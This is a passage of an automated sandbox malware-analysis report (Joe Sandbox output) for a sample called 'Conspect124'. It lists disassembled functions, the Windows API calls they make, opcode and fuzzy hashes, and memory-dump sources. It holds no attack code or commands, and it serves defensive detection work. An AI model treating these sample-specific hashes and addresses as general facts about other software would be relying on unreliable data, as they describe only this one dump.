                                      • API String ID: 2803490479-1168259600
                                      • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                      • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                      Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0041BDDF
                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcmpmemset
                                      • String ID:
                                      • API String ID: 1065087418-0
                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                      Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                      • String ID:
                                      • API String ID: 1381354015-0
                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                      Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                      Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                      • String ID:
                                      • API String ID: 2154303073-0
                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                      Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0
                                      • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                      • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                      Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$PointerRead
                                      • String ID:
                                      • API String ID: 3154509469-0
                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                      Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                      • String ID:
                                      • API String ID: 4232544981-0
                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                      Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                      Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$FileModuleName
                                      • String ID:
                                      • API String ID: 3859505661-0
                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                      Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                      Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                      Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                      Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                      Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                      Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                      Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                      Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: EnumNamesResource
                                      • String ID:
                                      • API String ID: 3334572018-0
                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                      Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                      Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
